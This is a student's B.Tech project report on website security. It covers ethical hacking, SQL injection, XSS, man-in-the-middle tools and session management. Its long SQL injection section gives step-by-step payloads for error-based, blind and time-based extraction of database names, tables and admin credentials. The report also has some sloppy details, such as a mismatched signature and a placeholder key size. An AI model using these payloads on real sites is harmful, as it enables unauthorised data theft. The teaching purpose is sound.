final report noby

48
WEBSITE SECURITY A Major Project Report submitted in partial fulfillment of the requirements for the award of the degree of Bachelor of Technology in COMPUTER SCIENCE AND ENGINEERING UNDER GUIDENCE OF Er. Chetan Sharma By Noby Kumar Das (100960334990) 100960334990

Upload: mt-ra

Post on 13-May-2017

222 views

Category:

Documents


1 download

TRANSCRIPT

Page 1: Final Report Noby

WEBSITE SECURITYA Major Project Report

submitted in partial fulfillment of therequirements for the award of the degree

of

Bachelor of Technology

in

COMPUTER SCIENCE AND ENGINEERING

UNDER GUIDENCE OF Er. Chetan Sharma

ByNoby Kumar Das(100960334990)100960334990

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERINGSURYA SCHOOL OF ENGINEERING AND TECHNOLOGY, BAPROR

April,2014

Page 2: Final Report Noby

CERTIFICATE

I hereby certify that the work which is being presented in the B.Tech. Major Project Report entitled “Website Security”, in partial fulfillment of the requirements for the award of the Bachelor of Technology in Computer Science & Engineering and submitted to the Department of Computer Science & Engineering of Surya World Institutions of Academic Excellence Rajpura PB is an authentic record of my own work carried out during a period from January 2014 to April 2014 under the supervision of Er. Chetan Sharma, CSE Department.

The matter presented in this thesis has not been submitted by me for the award of any other degree elsewhere.

Signature of CandidateNOBY KUMAR DAS

100960334990

This is to certify that the above statement made by the candidate is correct to the best of my knowledge.

Signature of Supervisor(s)

Date: Er. Chetan Sharma Project Supervisor(s)

HeadDepartment of Computer Science & EngineeringSurya World Institutions of Academic Excellence , Bapror , Rajpura

1

Page 3: Final Report Noby

Abstract

Hacking has become a significant threat to networks exposed to the Internet. In order to prevent

systems from being hacked, the methods used by hackers must be well understood. Hackers

begin by selecting and footprinting a target network. Once the target network is mapped, hackers

proceed to map vulnerabilities and gain access by cracking passwords, using stack-smashing

attacks, or spoofing the IP address of trusted machines. Hackers can then sniff internal network

traffic or find other hosts that contain vital company secrets. Finally, a hacker can clean up

system logs in order to conceal the fact that an attack occurred. In this paper we explain how

each of these attack techniques is carried out.

The rapid and dramatic advances in information technology (IT) in recent years have

without question generated tremendous benefits. However, they have created significant and

unprecedented risks to operations. Computer security has, in turn, become much more important

as all levels of an organization to utilize information systems security measures to avoid data

tampering, fraud, disruptions in critical operations, and inappropriate of sensitive information.

After the boom in Networking and Software jobs, the past two year have seen a sharp rise in the

field of information security. Information Security and Ethical Hacking is the latest buzzword in

the industry. In the past five years, the percentage of hacking crimes, data thefts, data losses,

viruses and other cyber crimes have increased exponentially.

2

Page 4: Final Report Noby

ACKNOWLEDGMENT

I am highly grateful to the Mrs. Renu, HOD CSE, Surya College of Engineering & Technology, Rajpura, for providing this opportunity to carry out the six month industrial training at Secugenius Security Solutions, Ludhiana.

I would like to expresses my gratitude to other faculty members of Computer Science & Engineering department of SECT, Rajpura for providing academic inputs, guidance & encouragement throughout the training period.

I would like to express a deep sense of gratitude and thank Er. Chetan Sharma,Project Supervisor, without whose permission, wise counsel and able guidance, it would have not been possible to pursue my training in this manner.

The satisfaction that accompanies that the successful completion of any task would be incomplete without the mention of people whose ceaseless cooperation made it possible, whose constant guidance and encouragement crown all efforts with success. We are grateful to our project guide Mr. Chetan Soni for the guidance, inspiration and constructive suggestions that were helpful in the preparation of this project.

Finally, I express my indebtedness to all who have directly or indirectly contributed to the successful completion of my industrial training.

Sarabjeet Singh Marwaha

3

Page 5: Final Report Noby

Contents1. Introduction2. Need for Ethical Hacking and Cyber Security3. Project: Website Security4. SQL Injection5. CSS Attack6. Man in the Middle Attack7. Conclusion8. References

4

Page 6: Final Report Noby

List of Figures1. Boolean Attack Error2. Home Page of Attack Site3. Login to admin panel using SQL Injection Query4. Successful Entrance to the Admin Panel5. Database Stored on the website

5

Page 7: Final Report Noby

IntroductionThe Internet has become a widely used medium for companies, schools, and governments to

share data. Because of the need to exchange electronic information, most computer networks are

connected and exposed to traffic on the Internet. With this exposure comes security concerns.

Hackers are a significant threat because often all that lies between a hacker and a company’s

internal secrets may be a poorly administered firewall or border router.

How significant is this threat? A sampling of traffic into and out of a network over a few

days will often show hundreds, perhaps thousands of potentially malicious data packets.

Hundreds of hacking web sites have been born over the past years providing information ranging

from how to spoof email to how to gain root access on web servers. Hackers need not understand

the technology behind their methods; they can simply download a script and go to work. In

essence, the threat of a network being attacked is significant and should not be taken lightly

because even the novice hacker is capable of launching a potentially damaging attack.

How can hackers be stopped? To answer this question, it is important to understand how

a hacker attacks a system. From footprinting to log cleanup, a hacker’s methodology must be

well understood so that firewalls and Intrusion Detection Systems (IDS) can be built to prevent

or detect future attacks.

6

Page 8: Final Report Noby

Need For Ethical Hacking and Cyber Security

To catch a thief, think like a thief. That’s the basis for ethical hacking.

Ethical hacking must be encouraged for detection and prevention of automated application

attacks, because hackers are becoming adept at automating attacks by intensifying computerised

attacks at smaller, vulnerable and largely homogenous targets.

With the increased numbers and expanding knowledge of hackers combined with the

growing number of system vulnerabilities and other unknowns, the time will come when all

computer systems are hacked or compromised in some way. Protecting your systems from the

bad guys — and not just the generic vulnerabilities that everyone knows about — is absolutely

critical. Hacking preys on weak security practices and undisclosed vulnerabilities. Firewalls,

encryption, and virtual private networks (VPNs) can create a false feeling of safety. These

security systems often focus on high-level vulnerabilities, such as viruses and traffic through a

firewall, without affecting how hackers work. Attacking your own systems to discover

vulnerabilities is a step to making them more secure. This is the only proven method of greatly

hardening your systems from attack. If you don’t identify weaknesses, it’s a matter of time

before the vulnerabilities are exploited. As hackers expand their knowledge, so should you. You

must think like them to protect your systems from them. You, as the ethical hacker, must know

activities hackers carry out and how to stop their efforts. You should know what to look for and

how to use that information to thwart hackers’ efforts. You don’t have to protect your systems

from everything. You can’t. The only protection against everything is to unplug your computer

systems and lock them away so no one can touch them — not even you. That’s not the best

approach to information security. What’s important is to protect your systems from known

vulnerabilities and common hacker attacks. It’s impossible to buttress all possible vulnerabilities

on all your systems. You can’t plan for all possible attacks — especially the ones that are

currently unknown. However, the more combinations you try — the more you test whole

systems instead of individual units — the better your chances of discovering vulnerabilities that

affect everything as a whole. It makes little sense to harden your systems from unlikely attacks.

For instance, if you don’t have a lot of foot traffic in your office and no internal Web server

running, you may not have as much to worry about as an Internet hosting provider would have.

However, don’t forget about insider threats from malicious employees!

7

Page 9: Final Report Noby

Project: Website SecurityWebsite Security is an application that restricts access to certain areas within your Website.

These areas are protected by Hostname, by IP address, or by username and password. Web

application security is a branch of Information Security that deals specifically with security of

websites, web applications and web services.

At a high level, Web application security draws on the principles of application

security but applies them specifically to Internet and Web systems. Typically web applications

are developed using programming languages such as PHP, Java EE, Java, Python, Ruby,

ASP.NET, C#, VB.NET or Classic ASP.

Security threatsWith the emergence of Web 2.0, increased information sharing through social networking and

increasing business adoption of the Web as a means of doing business and delivering service,

websites are often attacked directly. Hackers either seek to compromise the corporate network or

the end-users accessing the website by subjecting them to drive-by downloading.

As a result, industry is paying increased attention to the security of the web applications

themselves in addition to the security of the underlying computer network and operating systems.

The majority of web application attacks occur through cross-site scripting (XSS) and SQL

injection attacks which typically result from flawed coding, and failure to sanitize input to and

output from the web application. These are ranked in the 2009 CWE/SANS Top 25 Most

Dangerous Programming Errors. According the security vendor Cenzic, the top vulnerabilities in

March 2012 include:

Cross Site Scripting, 37%

SQL Injection, 16%

Path Disclosure, 5%

Denial of Service, 5%

Code Execution, 4%

Memory Corruption, 4%

Cross Site Request Forgery, 4%

Information Disclosure, 3%

Arbitrary File, 3%

Local File Include, 2%

8

Page 10: Final Report Noby

Remote File Include, 1%

Buffer overflow, 1%

Other (PHP Injection, Javascript Injection, etc.), 15%

Security standardsOWASP is the emerging standards body for Web application security. In particular they have

published the OWASP Top 10 which describes in detail the major threats against web

applications. The Web Application Security Consortium (WASC) has created the Web Hacking

Incident Database and also produced open source best practice documents on Web application

security.

Security technologyWhile security is fundamentally based on people and processes, there are a number of technical

solutions to consider when designing, building and testing secure web applications. At a high

level, these solutions include:

Black Box testing tools such as Web application security scanners, vulnerability scanners

and penetration testing software

White Box testing tools such as static source code analyzers

Fuzzing Tools used for input testing

Web application firewalls (WAF) used to provide firewall-type protection at the web

application layer

Password cracking tools for testing password strength and implementation

AttackAttacks are the techniques that attackers use to exploit the vulnerabilities in applications. Attacks

are often confused with vulnerabilities, so please try to be sure that the attack you are describing

is something that an attacker would do, rather than a weakness in an application.

Examples:

Brute Force: Is an exhaustive attack that works by testing every possible value of a

parameter (password, file name, etc.) Brute_force_attack

Cache Poisoning: Is an attack that seeks to introduce false or malicious data into a web

cache, normally via HTTP Response Splitting. Cache_Poisoning

9

Page 11: Final Report Noby

DNS Poisoning: Is an attack that seeks to introduce false DNS address information into

the cache of a DNS server, where it will be served to other users enabling a variety of

attacks. (e.g., Phishing)

Various Attacks Used in Website Hacking1. SQL Injection

2. Shell uploading

3. LFI

4. RFI

5. XSS

6. cSRF(XSRF)

7. Symlinking

8. SSI

9. HTML Injection

10. Server Rooting

10

Page 12: Final Report Noby

SQL Injection

SQL injection (Structured Query Language Injection) is the first step in the entry to exploiting or

hacking websites. Sqli is just basically injecting queries into a database or using queries to get

authorization bypass as an admin.

A SQL injection attack consists of insertion or "injection" of a SQL query

via the input data from the client to the application. A successful SQL injection exploit can read

sensitive data from the database, modify database data (Insert/Update/Delete), execute

administration operations on the database (such as shutdown the DBMS), recover the content of

a given file present on the DBMS file system and in some cases issue commands to the operating

system. SQL injection attacks are a type of injection attack, in which SQL commands are

injected into data-plane input in order to effect the execution of predefined SQL commands.

Threat Modeling SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause

repudiation issues such as voiding transactions or changing balances, allow the complete

disclosure of all data on the system, destroy the data or make it otherwise unavailable,

and become administrators of the database server.

SQL Injection is very common with PHP and ASP applications due to the prevalence of

older functional interfaces. Due to the nature of programmatic interfaces available, J2EE

and ASP.NET applications are less likely to have easily exploited SQL injections.

The severity of SQL Injection attacks is limited by the attacker’s skill and imagination,

and to a lesser extent, defense in depth countermeasures, such as low privilege

connections to the database server and so on. In general, consider SQL Injection a high

impact severity.

SQL injection errors occur when:

1. Data enters a program from an untrusted source.

2. The data used to dynamically construct a SQL query

The main consequences are:

Confidentiality: Since SQL databases generally hold sensitive data, loss of

confidentiality is a frequent problem with SQL Injection vulnerabilities.

11

Page 13: Final Report Noby

Authentication: If poor SQL commands are used to check user names and passwords, it

may be possible to connect to a system as another user with no previous knowledge of the

password.

Authorization: If authorization information is held in a SQL database, it may be possible

to change this information through the successful exploitation of a SQL Injection

vulnerability.

Integrity: Just as it may be possible to read sensitive information, it is also possible to

make changes or even delete this information with a SQL Injection attack.

12

Page 14: Final Report Noby

Technique of SQL Injection

a) String ErrorTo make this simple to understand, String Based SQL injection happens when the site is

vulnerable to SQL injection but doesn't show us the results needed to be displayed after

executing our SQLi query.

Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--

"group by" doesn't work

"having 1=2" doesn't work

queries related to SQL injection doesn't work (will show a normal page even though site is

vuln to SQLi)

Solution to this issue in order to hack a site with String Based SQL injection

The answer to this problem is by using the following format while trying to hack a site with

SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.

The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

b) Boolean Exploitation TechniqueThe Boolean exploitation technique is very useful when the tester finds a Blind SQL

Injection situation, in which nothing is known on the outcome of an operation. For

example, this behavior happens in cases where the programmer has created a custom

error page that does not reveal anything on the structure of the query or on the database.

(The page does not return a SQL error, it may just return a HTTP 500, 404, or redirect).

13

Page 15: Final Report Noby

By using inference methods, it is possible to avoid this obstacle and thus to succeed in

recovering the values of some desired fields. This method consists of carrying out a series

of boolean queries against the server, observing the answers and finally deducing the

meaning of such answers. We consider, as always, the www.example.com domain and

we suppose that it contains a parameter named id vulnerable to SQL injection. This

means that carrying out the following request:

http://www.example.com/index.php?id=1'

We will get one page with a custom message error which is due to a syntactic error in the

query. We suppose that the query executed on the server is:

SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

Which is exploitable through the methods seen previously. What we want to obtain is the

values of the username field. The tests that we will execute will allow us to obtain the

value of the username field, extracting such value character by character. This is possible

through the use of some standard functions, present in practically every database. For our

examples, we will use the following pseudo-functions:

SUBSTRING (text, start, length): returns a substring starting from the position "start" of

text and of length "length". If "start" is greater than the length of text, the function returns

a null value.

ASCII (char): it gives back ASCII value of the input character. A null value is returned if

char is 0.

LENGTH (text): it gives back the number of characters in the input text.

Through such functions, we will execute our tests on the first character and, when we have

discovered the value, we will pass to the second and so on, until we will have discovered the

entire value. The tests will take advantage of the function SUBSTRING, in order to select

only one character at a time (selecting a single character means to impose the length

parameter to 1), and the function ASCII, in order to obtain the ASCII value, so that we can

do numerical comparison. The results of the comparison will be done with all the values of

the ASCII table, until the right value is found. As an example, we will use the following

value for Id:

$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

That creates the following query (from now on, we will call it "inferential query"):

14

Page 16: Final Report Noby

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND

ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'

The previous example returns a result if and only if the first character of the field username is

equal to the ASCII value 97. If we get a false value, then we increase the index of the ASCII

table from 97 to 98 and we repeat the request. If instead we obtain a true value, we set to zero

the index of the ASCII table and we analyze the next character, modifying the parameters of

the SUBSTRING function. The problem is to understand in which way we can distinguish

tests returning a true value from those that return false. To do this, we create a query that

always returns false. This is possible by using the following value for Id:

$Id=1' AND '1' = '2

Which will create the following query:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'

The obtained response from the server (that is HTML code) will be the false value for our

tests. This is enough to verify whether the value obtained from the execution of the

inferential query is equal to the value obtained with the test executed before. Sometimes, this

method does not work. If the server returns two different pages as a result of two identical

consecutive web requests, we will not be able to discriminate the true value from the false

value. In these particular cases, it is necessary to use particular filters that allow us to

eliminate the code that changes between the two requests and to obtain a template. Later on,

for every inferential request executed, we will extract the relative template from the response

using the same function, and we will perform a control between the two templates in order to

decide the result of the test.

In the previous discussion, we haven't dealt with the problem of determining the termination

condition for out tests, i.e., when we should end the inference procedure. A techniques to do

this uses one characteristic of the SUBSTRING function and the LENGTH function. When

the test compares the current character with the ASCII code 0 (i.e., the value null) and the

test returns the value true, then either we are done with the inference procedure (we have

scanned the whole string), or the value we have analyzed contains the null character.

We will insert the following value for the field Id:

$Id=1' AND LENGTH(username)=N AND '1' = '1

15

Page 17: Final Report Noby

Where N is the number of characters that we have analyzed up to now (not counting the null

value). The query will be:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND LENGTH(username)=N

AND '1' = '1'

The query returns either true or false. If we obtain true, then we have completed the inference

and, therefore, we know the value of the parameter. If we obtain false, this means that the

null character is present in the value of the parameter, and we must continue to analyze the

next parameter until we find another null value.

The blind SQL injection attack needs a high volume of queries. The tester may need an

automatic tool to exploit the vulnerability.

c) Blind QueryBlind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks

the database true or false questions and determines the answer based on the applications

response. This attack is often used when the web application is configured to show generic

error messages, but has not mitigated the code that is vulnerable to SQL injection.

When an attacker exploits SQL injection, sometimes the web application displays error

messages from the database complaining that the SQL Query's syntax is incorrect. Blind

SQL injection is nearly identical to normal SQL Injection, the only difference being the way

the data is retrieved from the database. When the database does not output data to the web

page, an attacker is forced to steal data by asking the database a series of true or false

questions. This makes exploiting the SQL Injection vulnerability more difficult, but not

impossible.

d) Double Query SQL - Double Query SQL Injection is a method for querying SQL

databases by using two queries together combined in a single query statement. This

basically ends up confusing the backend database and causing errors to be thrown. The

errors received will contain the information we are trying to extract, just like previous

error-based SQL injection examples I have covered.

NOTE: I should also note that while it is definately faster than Blind & Time-Based

injections, we will not have the ability to access anything using GROUP_CONCAT() which

means we will need to heavily rely on CONCAT() and the LIMIT feature to get all of the

info from the database.

16

Page 18: Final Report Noby

OK now that you have an idea of what it is, let us begin testing it out and see it in action.

When it comes to testing a site for vulnerability you can run the standrd checks for basic

Union injection. If they work then no need to complicate things with Double Queries, but

when those fail it is time to test Double Query injections. This is our last hope of finding an

injection vector, assuming you have tested all other methods prior to this one (I do).

Anyways, we can use Double Query injection to test for the current database name first and

then work our way through the rest of the databse if it works. If it returns a value then we

have found a vulnerability and can continue, if not then you may be S.O.L. since I have given

you all my SQLi methods. Here is what the query looks like to run a quick check for the

current database:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

RESULT:

duplicate entry '~'MyCurrent_DB'~1' for key 1

Fig. 1 Boolean Attack Error

17

Page 19: Final Report Noby

As you can see the site is vulnerable and returned an error with the current database listed in

the error, in this case "MyCurrent_DB". If you are scratching your head trying to figure this

one out, here is the breakdown. We have used both floor() and rand() to query

information_schema.tables which are being nulled out in this request as floor(rand(0)*2) is

null, which allows the rest of our request to be processed and return the current database

name. The basic syntax will repeat itself so you will pick it up over time if it doesn’t catch on

right away. Moving on...Now that we know it is vulnerable we can test for additional

databases, as well as version info and user info,. Once the basic system info is grasped we

can move on to grabbing tables, columns, and finally extraction of data. In order to test for

additional databases we need to first grab the count by alter the above request to:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM

information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT

0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry '~'Number_of_Databases_Available'~1' for key 1

Now that we have the count we can alter the above to use CONCAT and LIMIT to grab the

name of each database available, like this:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM

information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT

0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

NOTE: You will need to keep incrementing the value of "N" in the middle of the above

query to work your way through the available DB names, just keep going until you have

reached the number returned in our request above this one. (i.e. LIMIT 0,1 followed by

LIMIT 1,1 followed by LIMIT 2,1 and just repeat as needed). We have to do this since we

can’t use GROUP_CONCAT() :(

RESULT:

Duplicate entry '~'Name_of_Database'~1' for key 1

18

Page 20: Final Report Noby

*Message will appear the same, but LIMIT will be changed to get different DB Name each

time

Once you have all the DB names you might want to find out the current user and confirm

version info as well as some other basic stuff. It can be done using slight variations to our

original query for current database which would look like this, notice only the call in the

middle is being altered:

VERSION:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry '~'5.1.1-log'~1' for key 1

USER:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

concat(user())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry '~'dumbdba@localhost'~1' for key 1

DATADIR:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

concat(@@datadir)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x

FROM information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry '~'/var/mysql/'~1' for key 1

HOSTNAME:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

concat(@@hostname)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x

FROM information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry '~'[email protected]'~1' for key 1

19

Page 21: Final Report Noby

NOTE: DATADIR & HOSTNAME might not always work, depending on version and DB

setup

Alright, we have gathered the basic info so now it is time to move on to actually grabbing the

table and column names. As with other methods we will start with tables and then work to

columns, and like the above examples we will be using CONCAT and LIMIT to allow us to

get the entire contents since we cant use GROUP_CONCAT(). We first get the count and

then enumerate the tables. It looks like this:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM

`information_schema`.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>))

FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry 'Number_Of_Tables' for key 1

Once the count is known, we enumerate tables one by one...

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM

information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>

LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

RESULT:

Duplicate entry 'TABLE_Name' for key 1

You will need to HEX the DB Name from which you are pulling table names from or it will

not be properly processed, same is true if you are pulling columns from tables as we will do

in this next step now that we have found some tables. Grabbing the column count looks like

this:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM

20

Page 22: Final Report Noby

`information_schema`.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>

AND table_name=<HEX_VLAUE_OF_TABLE_NAME>)) FROM

information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables

GROUP BY x)a)

RESULT:

Duplicate entry 'Number_Of_Columns_In_Table' for key 1

Once the number of columns is known we can just use LIMIT again to sort through them one

by one, just keep incrementing LIMIT until you have found as many as it returned in the

above request. Grabbing actual columns looks like this:

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select

(select distinct concat(cast(column_name as char)) FROM information_schema.columns

WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND

table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT 0,1)) FROM

information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables

GROUP BY x)a)

RESULT:

Duplicate entry 'COLUMN_Name' for key 1

OK, so now we have outlined the entire database structure and know the tables and columns.

Now it is finally time to extract the desired data from the database. In order to do this we

change the query to look like this:

COMMAND:

http://site.com/index.php?id=5+and+(select 1

FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3

a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM

information_schema.tables+GROUP BY x)b)

RESULT:

Duplicate entry ':admin:adminpass:admin@localhost:' for key 1

21

Page 23: Final Report Noby

Type Of SQL Injection.1) Poorly Filter String - Poorly filter string are caused by user input which is not filter by

escape character.

Escape Character - A escape character are the character which is used to abort the current

command and go back to the previous command.

2) Incorrect Type Handling - In this type of data type if the input is not valid which is

menupulated by SQL Server.

3) Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks

the database true or false questions and determines the answer based on the applications

response. This attack is often used when the web application is configured to show generic error

messages, but has not mitigated the code that is vulnerable to SQL injection.

When an attacker exploits SQL injection, sometimes the web application displays error messages

from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is

nearly identical to normal SQL Injection, the only difference being the way the data is retrieved

from the database. When the database does not output data to the web page, an attacker is forced

to steal data by asking the database a series of true or false questions. This makes exploiting the

SQL Injection vulnerability more difficult, but not impossible.

Examples

Content-based

Using a simple page, which displays an article with given ID as the parameter, the attacker may

perform a couple of simple tests to determine if the page is vulnerable to SQL Injection attacks.

Example URL:

http://newspaper.com/items.php?id=2

sends the following query to the database:

SELECT title, description, body FROM items WHERE ID = 2

The attacker may then try to inject a query that returns 'false':

http://newspaper.com/items.php?id=2 and 1=2

Now the SQL query should looks like this:

SELECT title, description, body FROM items WHERE ID = 2 and 1=2

22

Page 24: Final Report Noby

If the web application is vulnerable to SQL Injection, then it probably will not return anything.

To make sure, the attacker will inject a query that will return 'true':

http://newspaper.com/items.php?id=2 and 1=1

If the content of the page that returns 'true' is different than that of the page that returns 'false',

then the attacker is able to distinguish when the executed query returns true or false.

Once this has been verified, the only limitations are privileges set up by the database

administrator, different SQL syntax, and the attacker's imagination.

Time-based

This type of blind SQL injection relies on the database pausing for a specified amount of time,

then returning the results, indicating successful SQL query executing. Using this method, an

attacker enumerates each letter of the desired piece of data using the following logic:

If the first letter of the first database's name is an 'A', wait for 10 seconds.

If the first letter of the first database's name is an 'B', wait for 10 seconds. etc.

Microsoft SQL Server

http://www.site.com/vulnerable.php?id=1' waitfor delay '00:00:10'--

MySQL

SELECT IF(expression, true, false)

Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the

expression is True.

BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))

- will execute the ENCODE function 5000000 times.

Depending on the database server's performance and load, it should take just a moment to finish

this operation. The important thing is, from the attacker's point of view, to specify a high-enough

number of BENCHMARK() function repetitions to affect the database response time in a

noticeable way.

Example combination of both queries:

1 UNION SELECT IF(SUBSTRING(user_password,1,1) =

CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users

WHERE user_id = 1;

23

Page 25: Final Report Noby

If the database response took a long time, we may expect that the first user password character

with user_id = 1 is character '2'.

(CHAR(50) == '2')

Using this method for the rest of characters, it's possible to enumerate entire passwords stored in

the database. This method works even when the attacker injects the SQL queries and the content

of the vulnerable page doesn't change.

Obviously, in this example, the names of the tables and the number of columns was specified.

However, it's possible to guess them or check with a trial and error method.

Databases other than MySQL also have time-based functions which allow them to be used for

time-based attacks:

MS SQL 'WAIT FOR DELAY '0:0:10

PostgreSQL - pg_sleep()

Conducting Blind_SQL_Injection attacks manually is very time consuming, but there are a lot of

tools which automate this process. One of them is SQLMap (http://sqlmap.org/) partly developed

within OWASP grant program. On the other hand, tools of this kind are very sensitive to even

small deviations from the rule. This includes:

scanning other website clusters, where clocks are not ideally synchronized,

WWW services where argument acquiring method was changed, e.g. from /index.php?

ID=10 to /ID,10

Remote Database Fingerprinting

If the attacker is able to determine when his query returns True or False, then he may fingerprint

the RDBMS. This will make the whole attack much easier. If the time-based approach is used,

this helps determine what type of database is in use. Another popular methods to do this is to call

functions which will return the current date. MySQL, MSSQL, and Oracle have different

functions for that, respectively now(), getdate(), and sysdate().

24

Page 26: Final Report Noby

SQL Injection Applying on Admin Panel

Fig.2 Home Page of Attack Site

Fig.3 Login to admin panel using SQL Injection Query

25

Page 27: Final Report Noby

Fig.4 Successful Entrance to the Admin Panel

Fig.5 Database stored on the websit

26

Page 28: Final Report Noby

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

Cross-Site Scripting (XSS) attacks occur when:

1. Data enters a Web application through an untrusted source, most frequently a web request.

2. The data is included in dynamic content that is sent to a web user without being validated for malicious script.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

CSRF Security Measures

HTML Entity Encoding

HTML entity encoding is the process of replacing ASCII characters with their 'HTML Entity' equivalents. For example, you would replace the "<" character with "&lt;"

Using HTML entity encoding is useful because HTML entities are 'inert' in most interpreters, especially browsers. This means that even if an attacker tricks your application into sending malicious code to another user's browser, the attack won't execute.

27

Page 29: Final Report Noby

Input Validation

Input validation refers to the process of validating all the input to an application before using it. Input validation is absolutely critical to application security, and most application risks involve tainted input at some level.

Many applications do not plan input validation, and leave it up to the individual developers. This is a recipe for disaster, as different developers will certainly all choose a different approach, and many will simply leave it out in the pursuit of more interesting development.

28

Page 30: Final Report Noby

Man-in-the-middle attack

The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication.

Fig.6 Man in the Middle Attack

29

Page 31: Final Report Noby

MITM Attack tools

There are several tools to realize a MITM attack. These tools are particularly efficient in LAN network environments, because they implement extra functionalities, like the arp spoof capabilities that permit the interception of communication between hosts.

PacketCreator Ettercap Dsniff Caine Abel

MITM Proxy only tools

Proxy tools only permit interactiion with the parts of the HTTP protocol, like the header and the body of a transaction, but do not have the capability to intercept the TCP connection between client and server. To intercept the communication, it’s necessary to use other network attack tools or configure the browser.

OWASP WebScarab Paros Proxy Burp Proxy ProxyFuzz Odysseus Proxy Fiddler (by Microsoft)

30

Page 32: Final Report Noby

Conclusion

Security of Website

Session Management

Things To Do

All applications in your organization should be developed following these design goals:

All applications should share a well-debugged and trusted session management mechanism.

All session identifiers should be sufficiently randomized so as to not be guessable. All session identifiers should use a key space of at least XXXX bits. All session identifiers should use the largest character set available to it. Sessions SHOULD timeout after 5 minutes for high-value applications, 10 minutes for

medium value applications, and 20 minutes for low risk applications. All session tokens in high value applications SHOULD be tied to a specific HTTP client

instance (session identifier and IP address). Application servers SHOULD use private temporary file areas per client/application to

store session data. All applications SHOULD use a cryptographically secure page or form nonce in a hidden

form field. Each form or page nonce SHOULD be removed from the active list as soon as it is

submitted. Session ID values submitted by the client should undergo the same validation checks as

